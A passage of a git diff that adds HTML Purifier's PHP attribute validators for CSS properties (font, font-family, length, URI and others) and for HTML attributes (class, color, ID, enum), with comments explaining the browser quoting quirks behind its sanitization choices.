$parameters_length = strcspn($value, ')', $cursor); + $parameters = substr($value, $cursor, $parameters_length); + $params = explode(',', $parameters); + $ret_params = array(); + $lookup = array(); + foreach ($params as $param) { + list($key, $value) = explode('=', $param); + $key = trim($key); + $value = trim($value); + if (isset($lookup[$key])) continue; + if ($key !== 'opacity') continue; + $value = $this->intValidator->validate($value, $config, $context); + if ($value === false) continue; + $int = (int) $value; + if ($int > 100) $value = '100'; + if ($int < 0) $value = '0'; + $ret_params[] = "$key=$value"; + $lookup[$key] = true; + } + $ret_parameters = implode(',', $ret_params); + $ret_function = "$function($ret_parameters)"; + return $ret_function; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Font.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Font.php new file mode 100644 index 000000000..699ee0b70 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Font.php @@ -0,0 +1,149 @@ +<?php + +/** + * Validates shorthand CSS property font. + */ +class HTMLPurifier_AttrDef_CSS_Font extends HTMLPurifier_AttrDef +{ + + /** + * Local copy of component validators. + * + * @note If we moved specific CSS property definitions to their own + * classes instead of having them be assembled at run time by + * CSSDefinition, this wouldn't be necessary. We'd instantiate + * our own copies. + */ + protected $info = array(); + + public function __construct($config) { + $def = $config->getCSSDefinition(); + $this->info['font-style'] = $def->info['font-style']; + $this->info['font-variant'] = $def->info['font-variant']; + $this->info['font-weight'] = $def->info['font-weight']; + $this->info['font-size'] = $def->info['font-size']; + $this->info['line-height'] = $def->info['line-height']; + $this->info['font-family'] = $def->info['font-family']; + } + + public function validate($string, $config, $context) { + + static $system_fonts = array( + 'caption' => true, + 'icon' => true, + 'menu' => true, + 'message-box' => true, + 'small-caption' => true, + 'status-bar' => true + ); + + // regular pre-processing + $string = $this->parseCDATA($string); + if ($string === '') return false; + + // check if it's one of the keywords + $lowercase_string = strtolower($string); + if (isset($system_fonts[$lowercase_string])) { + return $lowercase_string; + } + + $bits = explode(' ', $string); // bits to process + $stage = 0; // this indicates what we're looking for + $caught = array(); // which stage 0 properties have we caught? + $stage_1 = array('font-style', 'font-variant', 'font-weight'); + $final = ''; // output + + for ($i = 0, $size = count($bits); $i < $size; $i++) { + if ($bits[$i] === '') continue; + switch ($stage) { + + // attempting to catch font-style, font-variant or font-weight + case 0: + foreach ($stage_1 as $validator_name) { + if (isset($caught[$validator_name])) continue; + $r = $this->info[$validator_name]->validate( + $bits[$i], $config, $context); + if ($r !== false) { + $final .= $r . ' '; + $caught[$validator_name] = true; + break; + } + } + // all three caught, continue on + if (count($caught) >= 3) $stage = 1; + if ($r !== false) break; + + // attempting to catch font-size and perhaps line-height + case 1: + $found_slash = false; + if (strpos($bits[$i], '/') !== false) { + list($font_size, $line_height) = + explode('/', $bits[$i]); + if ($line_height === '') { + // ooh, there's a space after the slash! + $line_height = false; + $found_slash = true; + } + } else { + $font_size = $bits[$i]; + $line_height = false; + } + $r = $this->info['font-size']->validate( + $font_size, $config, $context); + if ($r !== false) { + $final .= $r; + // attempt to catch line-height + if ($line_height === false) { + // we need to scroll forward + for ($j = $i + 1; $j < $size; $j++) { + if ($bits[$j] === '') continue; + if ($bits[$j] === '/') { + if ($found_slash) { + return false; + } else { + $found_slash = true; + continue; + } + } + $line_height = $bits[$j]; + break; + } + } else { + // slash already found + $found_slash = true; + $j = $i; + } + if ($found_slash) { + $i = $j; + $r = $this->info['line-height']->validate( + $line_height, $config, $context); + if ($r !== false) { + $final .= '/' . $r; + } + } + $final .= ' '; + $stage = 2; + break; + } + return false; + + // attempting to catch font-family + case 2: + $font_family = + implode(' ', array_slice($bits, $i, $size - $i)); + $r = $this->info['font-family']->validate( + $font_family, $config, $context); + if ($r !== false) { + $final .= $r . ' '; + // processing completed successfully + return rtrim($final); + } + return false; + } + } + return false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/FontFamily.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/FontFamily.php new file mode 100644 index 000000000..0d9a4e12c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/FontFamily.php @@ -0,0 +1,197 @@ +<?php + +/** + * Validates a font family list according to CSS spec + */ +class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef +{ + + protected $mask = null; + + public function __construct() { + $this->mask = '- '; + for ($c = 'a'; $c <= 'z'; $c++) $this->mask .= $c; + for ($c = 'A'; $c <= 'Z'; $c++) $this->mask .= $c; + for ($c = '0'; $c <= '9'; $c++) $this->mask .= $c; // cast-y, but should be fine + // special bytes used by UTF-8 + for ($i = 0x80; $i <= 0xFF; $i++) { + // We don't bother excluding invalid bytes in this range, + // because the our restriction of well-formed UTF-8 will + // prevent these from ever occurring. + $this->mask .= chr($i); + } + + /* + PHP's internal strcspn implementation is + O(length of string * length of mask), making it inefficient + for large masks. However, it's still faster than + preg_match 8) + for (p = s1;;) { + spanp = s2; + do { + if (*spanp == c || p == s1_end) { + return p - s1; + } + } while (spanp++ < (s2_end - 1)); + c = *++p; + } + */ + // possible optimization: invert the mask. + } + + public function validate($string, $config, $context) { + static $generic_names = array( + 'serif' => true, + 'sans-serif' => true, + 'monospace' => true, + 'fantasy' => true, + 'cursive' => true + ); + $allowed_fonts = $config->get('CSS.AllowedFonts'); + + // assume that no font names contain commas in them + $fonts = explode(',', $string); + $final = ''; + foreach($fonts as $font) { + $font = trim($font); + if ($font === '') continue; + // match a generic name + if (isset($generic_names[$font])) { + if ($allowed_fonts === null || isset($allowed_fonts[$font])) { + $final .= $font . ', '; + } + continue; + } + // match a quoted name + if ($font[0] === '"' || $font[0] === "'") { + $length = strlen($font); + if ($length <= 2) continue; + $quote = $font[0]; + if ($font[$length - 1] !== $quote) continue; + $font = substr($font, 1, $length - 2); + } + + $font = $this->expandCSSEscape($font); + + // $font is a pure representation of the font name + + if ($allowed_fonts !== null && !isset($allowed_fonts[$font])) { + continue; + } + + if (ctype_alnum($font) && $font !== '') { + // very simple font, allow it in unharmed + $final .= $font . ', '; + continue; + } + + // bugger out on whitespace. form feed (0C) really + // shouldn't show up regardless + $font = str_replace(array("\n", "\t", "\r", "\x0C"), ' ', $font); + + // Here, there are various classes of characters which need + // to be treated differently: + // - Alphanumeric characters are essentially safe. We + // handled these above. + // - Spaces require quoting, though most parsers will do + // the right thing if there aren't any characters that + // can be misinterpreted + // - Dashes rarely occur, but they fairly unproblematic + // for parsing/rendering purposes. + // The above characters cover the majority of Western font + // names. + // - Arbitrary Unicode characters not in ASCII. Because + // most parsers give little thought to Unicode, treatment + // of these codepoints is basically uniform, even for + // punctuation-like codepoints. These characters can + // show up in non-Western pages and are supported by most + // major browsers, for example: "ï¼ï¼³ 明æœ" is a + // legitimate font-name + // <http://ja.wikipedia.org/wiki/MS_明æœ>. See + // the CSS3 spec for more examples: + // <http://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png> + // You can see live samples of these on the Internet: + // <http://www.google.co.jp/search?q=font-family+ï¼ï¼³+明æœ|ゴシック> + // However, most of these fonts have ASCII equivalents: + // for example, 'MS Mincho', and it's considered + // professional to use ASCII font names instead of + // Unicode font names. Thanks Takeshi Terada for + // providing this information. + // The following characters, to my knowledge, have not been + // used to name font names. + // - Single quote. While theoretically you might find a + // font name that has a single quote in its name (serving + // as an apostrophe, e.g. Dave's Scribble), I haven't + // been able to find any actual examples of this. + // Internet Explorer's cssText translation (which I + // believe is invoked by innerHTML) normalizes any + // quoting to single quotes, and fails to escape single + // quotes. (Note that this is not IE's behavior for all + // CSS properties, just some sort of special casing for + // font-family). So a single quote *cannot* be used + // safely in the font-family context if there will be an + // innerHTML/cssText translation. Note that Firefox 3.x + // does this too. + // - Double quote. In IE, these get normalized to + // single-quotes, no matter what the encoding. (Fun + // fact, in IE8, the 'content' CSS property gained + // support, where they special cased to preserve encoded + // double quotes, but still translate unadorned double + // quotes into single quotes.) So, because their + // fixpoint behavior is identical to single quotes, they + // cannot be allowed either. Firefox 3.x displays + // single-quote style behavior. + // - Backslashes are reduced by one (so \\ -> \) every + // iteration, so they cannot be used safely. This shows + // up in IE7, IE8 and FF3 + // - Semicolons, commas and backticks are handled properly. + // - The rest of the ASCII punctuation is handled properly. + // We haven't checked what browsers do to unadorned + // versions, but this is not important as long as the + // browser doesn't /remove/ surrounding quotes (as IE does + // for HTML). + // + // With these results in hand, we conclude that there are + // various levels of safety: + // - Paranoid: alphanumeric, spaces and dashes(?) + // - International: Paranoid + non-ASCII Unicode + // - Edgy: Everything except quotes, backslashes + // - NoJS: Standards compliance, e.g. sod IE. Note that + // with some judicious character escaping (since certain + // types of escaping doesn't work) this is theoretically + // OK as long as innerHTML/cssText is not called. + // We believe that international is a reasonable default + // (that we will implement now), and once we do more + // extensive research, we may feel comfortable with dropping + // it down to edgy. + + // Edgy: alphanumeric, spaces, dashes and Unicode. Use of + // str(c)spn assumes that the string was already well formed + // Unicode (which of course it is). + if (strspn($font, $this->mask) !== strlen($font)) { + continue; + } + + // Historical: + // In the absence of innerHTML/cssText, these ugly + // transforms don't pose a security risk (as \\ and \" + // might--these escapes are not supported by most browsers). + // We could try to be clever and use single-quote wrapping + // when there is a double quote present, but I have choosen + // not to implement that. (NOTE: you can reduce the amount + // of escapes by one depending on what quoting style you use) + // $font = str_replace('\\', '\\5C ', $font); + // $font = str_replace('"', '\\22 ', $font); + // $font = str_replace("'", '\\27 ', $font); + + // font possibly with spaces, requires quoting + $final .= "'$font', "; + } + $final = rtrim($final, ', '); + if ($final === '') return false; + return $final; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Ident.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Ident.php new file mode 100644 index 000000000..779794a0b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Ident.php @@ -0,0 +1,24 @@ +<?php + +/** + * Validates based on {ident} CSS grammar production + */ +class HTMLPurifier_AttrDef_CSS_Ident extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + + $string = trim($string); + + // early abort: '' and '0' (strings that convert to false) are invalid + if (!$string) return false; + + $pattern = '/^(-?[A-Za-z_][A-Za-z_\-0-9]*)$/'; + if (!preg_match($pattern, $string)) return false; + return $string; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php new file mode 100644 index 000000000..4e6b35e5a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php @@ -0,0 +1,40 @@ +<?php + +/** + * Decorator which enables !important to be used in CSS values. + */ +class HTMLPurifier_AttrDef_CSS_ImportantDecorator extends HTMLPurifier_AttrDef +{ + public $def, $allow; + + /** + * @param $def Definition to wrap + * @param $allow Whether or not to allow !important + */ + public function __construct($def, $allow = false) { + $this->def = $def; + $this->allow = $allow; + } + /** + * Intercepts and removes !important if necessary + */ + public function validate($string, $config, $context) { + // test for ! and important tokens + $string = trim($string); + $is_important = false; + // :TODO: optimization: test directly for !important and ! important + if (strlen($string) >= 9 && substr($string, -9) === 'important') { + $temp = rtrim(substr($string, 0, -9)); + // use a temp, because we might want to restore important + if (strlen($temp) >= 1 && substr($temp, -1) === '!') { + $string = rtrim(substr($temp, 0, -1)); + $is_important = true; + } + } + $string = $this->def->validate($string, $config, $context); + if ($this->allow && $is_important) $string .= ' !important'; + return $string; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Length.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Length.php new file mode 100644 index 000000000..a07ec5813 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Length.php @@ -0,0 +1,47 @@ +<?php + +/** + * Represents a Length as defined by CSS. + */ +class HTMLPurifier_AttrDef_CSS_Length extends HTMLPurifier_AttrDef +{ + + protected $min, $max; + + /** + * @param HTMLPurifier_Length $max Minimum length, or null for no bound. String is also acceptable. + * @param HTMLPurifier_Length $max Maximum length, or null for no bound. String is also acceptable. + */ + public function __construct($min = null, $max = null) { + $this->min = $min !== null ? HTMLPurifier_Length::make($min) : null; + $this->max = $max !== null ? HTMLPurifier_Length::make($max) : null; + } + + public function validate($string, $config, $context) { + $string = $this->parseCDATA($string); + + // Optimizations + if ($string === '') return false; + if ($string === '0') return '0'; + if (strlen($string) === 1) return false; + + $length = HTMLPurifier_Length::make($string); + if (!$length->isValid()) return false; + + if ($this->min) { + $c = $length->compareTo($this->min); + if ($c === false) return false; + if ($c < 0) return false; + } + if ($this->max) { + $c = $length->compareTo($this->max); + if ($c === false) return false; + if ($c > 0) return false; + } + + return $length->toString(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ListStyle.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ListStyle.php new file mode 100644 index 000000000..4406868c0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/ListStyle.php @@ -0,0 +1,78 @@ +<?php + +/** + * Validates shorthand CSS property list-style. + * @warning Does not support url tokens that have internal spaces. + */ +class HTMLPurifier_AttrDef_CSS_ListStyle extends HTMLPurifier_AttrDef +{ + + /** + * Local copy of component validators. + * @note See HTMLPurifier_AttrDef_CSS_Font::$info for a similar impl. + */ + protected $info; + + public function __construct($config) { + $def = $config->getCSSDefinition(); + $this->info['list-style-type'] = $def->info['list-style-type']; + $this->info['list-style-position'] = $def->info['list-style-position']; + $this->info['list-style-image'] = $def->info['list-style-image']; + } + + public function validate($string, $config, $context) { + + // regular pre-processing + $string = $this->parseCDATA($string); + if ($string === '') return false; + + // assumes URI doesn't have spaces in it + $bits = explode(' ', strtolower($string)); // bits to process + + $caught = array(); + $caught['type'] = false; + $caught['position'] = false; + $caught['image'] = false; + + $i = 0; // number of catches + $none = false; + + foreach ($bits as $bit) { + if ($i >= 3) return; // optimization bit + if ($bit === '') continue; + foreach ($caught as $key => $status) { + if ($status !== false) continue; + $r = $this->info['list-style-' . $key]->validate($bit, $config, $context); + if ($r === false) continue; + if ($r === 'none') { + if ($none) continue; + else $none = true; + if ($key == 'image') continue; + } + $caught[$key] = $r; + $i++; + break; + } + } + + if (!$i) return false; + + $ret = array(); + + // construct type + if ($caught['type']) $ret[] = $caught['type']; + + // construct image + if ($caught['image']) $ret[] = $caught['image']; + + // construct position + if ($caught['position']) $ret[] = $caught['position']; + + if (empty($ret)) return false; + return implode(' ', $ret); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Multiple.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Multiple.php new file mode 100644 index 000000000..4d62a40d7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Multiple.php @@ -0,0 +1,58 @@ +<?php + +/** + * Framework class for strings that involve multiple values. + * + * Certain CSS properties such as border-width and margin allow multiple + * lengths to be specified. This class can take a vanilla border-width + * definition and multiply it, usually into a max of four. + * + * @note Even though the CSS specification isn't clear about it, inherit + * can only be used alone: it will never manifest as part of a multi + * shorthand declaration. Thus, this class does not allow inherit. + */ +class HTMLPurifier_AttrDef_CSS_Multiple extends HTMLPurifier_AttrDef +{ + + /** + * Instance of component definition to defer validation to. + * @todo Make protected + */ + public $single; + + /** + * Max number of values allowed. + * @todo Make protected + */ + public $max; + + /** + * @param $single HTMLPurifier_AttrDef to multiply + * @param $max Max number of values allowed (usually four) + */ + public function __construct($single, $max = 4) { + $this->single = $single; + $this->max = $max; + } + + public function validate($string, $config, $context) { + $string = $this->parseCDATA($string); + if ($string === '') return false; + $parts = explode(' ', $string); // parseCDATA replaced \r, \t and \n + $length = count($parts); + $final = ''; + for ($i = 0, $num = 0; $i < $length && $num < $this->max; $i++) { + if (ctype_space($parts[$i])) continue; + $result = $this->single->validate($parts[$i], $config, $context); + if ($result !== false) { + $final .= $result . ' '; + $num++; + } + } + if ($final === '') return false; + return rtrim($final); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Number.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Number.php new file mode 100644 index 000000000..3f99e12ec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Number.php @@ -0,0 +1,69 @@ +<?php + +/** + * Validates a number as defined by the CSS spec. + */ +class HTMLPurifier_AttrDef_CSS_Number extends HTMLPurifier_AttrDef +{ + + /** + * Bool indicating whether or not only positive values allowed. + */ + protected $non_negative = false; + + /** + * @param $non_negative Bool indicating whether negatives are forbidden + */ + public function __construct($non_negative = false) { + $this->non_negative = $non_negative; + } + + /** + * @warning Some contexts do not pass $config, $context. These + * variables should not be used without checking HTMLPurifier_Length + */ + public function validate($number, $config, $context) { + + $number = $this->parseCDATA($number); + + if ($number === '') return false; + if ($number === '0') return '0'; + + $sign = ''; + switch ($number[0]) { + case '-': + if ($this->non_negative) return false; + $sign = '-'; + case '+': + $number = substr($number, 1); + } + + if (ctype_digit($number)) { + $number = ltrim($number, '0'); + return $number ? $sign . $number : '0'; + } + + // Period is the only non-numeric character allowed + if (strpos($number, '.') === false) return false; + + list($left, $right) = explode('.', $number, 2); + + if ($left === '' && $right === '') return false; + if ($left !== '' && !ctype_digit($left)) return false; + + $left = ltrim($left, '0'); + $right = rtrim($right, '0'); + + if ($right === '') { + return $left ? $sign . $left : '0'; + } elseif (!ctype_digit($right)) { + return false; + } + + return $sign . $left . '.' . $right; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Percentage.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Percentage.php new file mode 100644 index 000000000..c34b8fc3c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/Percentage.php @@ -0,0 +1,40 @@ +<?php + +/** + * Validates a Percentage as defined by the CSS spec. + */ +class HTMLPurifier_AttrDef_CSS_Percentage extends HTMLPurifier_AttrDef +{ + + /** + * Instance of HTMLPurifier_AttrDef_CSS_Number to defer number validation + */ + protected $number_def; + + /** + * @param Bool indicating whether to forbid negative values + */ + public function __construct($non_negative = false) { + $this->number_def = new HTMLPurifier_AttrDef_CSS_Number($non_negative); + } + + public function validate($string, $config, $context) { + + $string = $this->parseCDATA($string); + + if ($string === '') return false; + $length = strlen($string); + if ($length === 1) return false; + if ($string[$length - 1] !== '%') return false; + + $number = substr($string, 0, $length - 1); + $number = $this->number_def->validate($number, $config, $context); + + if ($number === false) return false; + return "$number%"; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/TextDecoration.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/TextDecoration.php new file mode 100644 index 000000000..772c922d8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/TextDecoration.php @@ -0,0 +1,38 @@ +<?php + +/** + * Validates the value for the CSS property text-decoration + * @note This class could be generalized into a version that acts sort of + * like Enum except you can compound the allowed values. + */ +class HTMLPurifier_AttrDef_CSS_TextDecoration extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + + static $allowed_values = array( + 'line-through' => true, + 'overline' => true, + 'underline' => true, + ); + + $string = strtolower($this->parseCDATA($string)); + + if ($string === 'none') return $string; + + $parts = explode(' ', $string); + $final = ''; + foreach ($parts as $part) { + if (isset($allowed_values[$part])) { + $final .= $part . ' '; + } + } + $final = rtrim($final); + if ($final === '') return false; + return $final; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/URI.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/URI.php new file mode 100644 index 000000000..c2f767e57 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/CSS/URI.php @@ -0,0 +1,61 @@ +<?php + +/** + * Validates a URI in CSS syntax, which uses url('http://example.com') + * @note While theoretically speaking a URI in a CSS document could + * be non-embedded, as of CSS2 there is no such usage so we're + * generalizing it. This may need to be changed in the future. + * @warning Since HTMLPurifier_AttrDef_CSS blindly uses semicolons as + * the separator, you cannot put a literal semicolon in + * in the URI. Try percent encoding it, in that case. + */ +class HTMLPurifier_AttrDef_CSS_URI extends HTMLPurifier_AttrDef_URI +{ + + public function __construct() { + parent::__construct(true); // always embedded + } + + public function validate($uri_string, $config, $context) { + // parse the URI out of the string and then pass it onto + // the parent object + + $uri_string = $this->parseCDATA($uri_string); + if (strpos($uri_string, 'url(') !== 0) return false; + $uri_string = substr($uri_string, 4); + $new_length = strlen($uri_string) - 1; + if ($uri_string[$new_length] != ')') return false; + $uri = trim(substr($uri_string, 0, $new_length)); + + if (!empty($uri) && ($uri[0] == "'" || $uri[0] == '"')) { + $quote = $uri[0]; + $new_length = strlen($uri) - 1; + if ($uri[$new_length] !== $quote) return false; + $uri = substr($uri, 1, $new_length - 1); + } + + $uri = $this->expandCSSEscape($uri); + + $result = parent::validate($uri, $config, $context); + + if ($result === false) return false; + + // extra sanity check; should have been done by URI + $result = str_replace(array('"', "\\", "\n", "\x0c", "\r"), "", $result); + + // suspicious characters are ()'; we're going to percent encode + // them for safety. + $result = str_replace(array('(', ')', "'"), array('%28', '%29', '%27'), $result); + + // there's an extra bug where ampersands lose their escaping on + // an innerHTML cycle, so a very unlucky query parameter could + // then change the meaning of the URL. Unfortunately, there's + // not much we can do about that... + + return "url(\"$result\")"; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Clone.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Clone.php new file mode 100644 index 000000000..ce68dbd54 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Clone.php @@ -0,0 +1,28 @@ +<?php + +/** + * Dummy AttrDef that mimics another AttrDef, BUT it generates clones + * with make. + */ +class HTMLPurifier_AttrDef_Clone extends HTMLPurifier_AttrDef +{ + /** + * What we're cloning + */ + protected $clone; + + public function __construct($clone) { + $this->clone = $clone; + } + + public function validate($v, $config, $context) { + return $this->clone->validate($v, $config, $context); + } + + public function make($string) { + return clone $this->clone; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Enum.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Enum.php new file mode 100644 index 000000000..5d603ebcc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/Enum.php @@ -0,0 +1,65 @@ +<?php + +// Enum = Enumerated +/** + * Validates a keyword against a list of valid values. + * @warning The case-insensitive compare of this function uses PHP's + * built-in strtolower and ctype_lower functions, which may + * cause problems with international comparisons + */ +class HTMLPurifier_AttrDef_Enum extends HTMLPurifier_AttrDef +{ + + /** + * Lookup table of valid values. + * @todo Make protected + */ + public $valid_values = array(); + + /** + * Bool indicating whether or not enumeration is case sensitive. + * @note In general this is always case insensitive. + */ + protected $case_sensitive = false; // values according to W3C spec + + /** + * @param $valid_values List of valid values + * @param $case_sensitive Bool indicating whether or not case sensitive + */ + public function __construct( + $valid_values = array(), $case_sensitive = false + ) { + $this->valid_values = array_flip($valid_values); + $this->case_sensitive = $case_sensitive; + } + + public function validate($string, $config, $context) { + $string = trim($string); + if (!$this->case_sensitive) { + // we may want to do full case-insensitive libraries + $string = ctype_lower($string) ? $string : strtolower($string); + } + $result = isset($this->valid_values[$string]); + + return $result ? $string : false; + } + + /** + * @param $string In form of comma-delimited list of case-insensitive + * valid values. Example: "foo,bar,baz". Prepend "s:" to make + * case sensitive + */ + public function make($string) { + if (strlen($string) > 2 && $string[0] == 's' && $string[1] == ':') { + $string = substr($string, 2); + $sensitive = true; + } else { + $sensitive = false; + } + $values = explode(',', $string); + return new HTMLPurifier_AttrDef_Enum($values, $sensitive); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Bool.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Bool.php new file mode 100644 index 000000000..e06987eb8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Bool.php @@ -0,0 +1,28 @@ +<?php + +/** + * Validates a boolean attribute + */ +class HTMLPurifier_AttrDef_HTML_Bool extends HTMLPurifier_AttrDef +{ + + protected $name; + public $minimized = true; + + public function __construct($name = false) {$this->name = $name;} + + public function validate($string, $config, $context) { + if (empty($string)) return false; + return $this->name; + } + + /** + * @param $string Name of attribute + */ + public function make($string) { + return new HTMLPurifier_AttrDef_HTML_Bool($string); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Class.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Class.php new file mode 100644 index 000000000..370068d97 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Class.php @@ -0,0 +1,34 @@ +<?php + +/** + * Implements special behavior for class attribute (normally NMTOKENS) + */ +class HTMLPurifier_AttrDef_HTML_Class extends HTMLPurifier_AttrDef_HTML_Nmtokens +{ + protected function split($string, $config, $context) { + // really, this twiddle should be lazy loaded + $name = $config->getDefinition('HTML')->doctype->name; + if ($name == "XHTML 1.1" || $name == "XHTML 2.0") { + return parent::split($string, $config, $context); + } else { + return preg_split('/\s+/', $string); + } + } + protected function filter($tokens, $config, $context) { + $allowed = $config->get('Attr.AllowedClasses'); + $forbidden = $config->get('Attr.ForbiddenClasses'); + $ret = array(); + foreach ($tokens as $token) { + if ( + ($allowed === null || isset($allowed[$token])) && + !isset($forbidden[$token]) && + // We need this O(n) check because of PHP's array + // implementation that casts -0 to 0. + !in_array($token, $ret, true) + ) { + $ret[] = $token; + } + } + return $ret; + } +} diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Color.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Color.php new file mode 100644 index 000000000..00d865723 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/Color.php @@ -0,0 +1,32 @@ +<?php + +/** + * Validates a color according to the HTML spec. + */ +class HTMLPurifier_AttrDef_HTML_Color extends HTMLPurifier_AttrDef +{ + + public function validate($string, $config, $context) { + + static $colors = null; + if ($colors === null) $colors = $config->get('Core.ColorKeywords'); + + $string = trim($string); + + if (empty($string)) return false; + if (isset($colors[strtolower($string)])) return $colors[$string]; + if ($string[0] === '#') $hex = substr($string, 1); + else $hex = $string; + + $length = strlen($hex); + if ($length !== 3 && $length !== 6) return false; + if (!ctype_xdigit($hex)) return false; + if ($length === 3) $hex = $hex[0].$hex[0].$hex[1].$hex[1].$hex[2].$hex[2]; + + return "#$hex"; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/FrameTarget.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/FrameTarget.php new file mode 100644 index 000000000..ae6ea7c01 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/FrameTarget.php @@ -0,0 +1,21 @@ +<?php + +/** + * Special-case enum attribute definition that lazy loads allowed frame targets + */ +class HTMLPurifier_AttrDef_HTML_FrameTarget extends HTMLPurifier_AttrDef_Enum +{ + + public $valid_values = false; // uninitialized value + protected $case_sensitive = false; + + public function __construct() {} + + public function validate($string, $config, $context) { + if ($this->valid_values === false) $this->valid_values = $config->get('Attr.AllowedFrameTargets'); + return parent::validate($string, $config, $context); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/ID.php b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/ID.php new file mode 100644 index 000000000..0015fa1eb --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/ID.php @@ -0,0 +1,80 @@ +<?php + +/** + * Validates the HTML attribute ID. + * @warning Even though this is the id processor, it + * will ignore the directive Attr:IDBlacklist, since it will only + * go according to the ID accumulator. Since the accumulator is + * automatically generated, it will have already absorbed the + * blacklist. If you're hacking around, make sure you use load()! + */ + +class HTMLPurifier_AttrDef_HTML_ID extends HTMLPurifier_AttrDef +{ + + // selector is NOT a valid thing to use for IDREFs, because IDREFs + // *must* target IDs that exist, whereas selector #ids do not. + + /** + * Determines whether or not we're validating an ID in a CSS + * selector context. + */ + protected $selector; + + public function __construct($selector = false) { + $this->selector = $selector; + } + + public function validate($id, $config, $context) { + + if (!$this->selector && !$config->get('Attr.EnableID')) return false; + + $id = trim($id); // trim it first + + if ($id === '') return false; + + $prefix = $config->get('Attr.IDPrefix'); + if ($prefix !== '') { + $prefix .= $config->get('Attr.IDPrefixLocal'); + // prevent re-appending the prefix + if (strpos($id, $prefix) !== 0) $id = $prefix . $id; + } elseif ($config->get('Attr.IDPrefixLocal') !== '') { + trigger_error('%Attr.IDPrefixLocal cannot be used unless '. + '%Attr.IDPrefix is set', E_USER_WARNING); + } + + if (!$this->selector) { + $id_accumulator =& $context->get('IDAccumulator'); + if (isset($id_accumulator->ids[$id])) return false; + } + + // we purposely avoid using regex, hopefully this is faster + + if 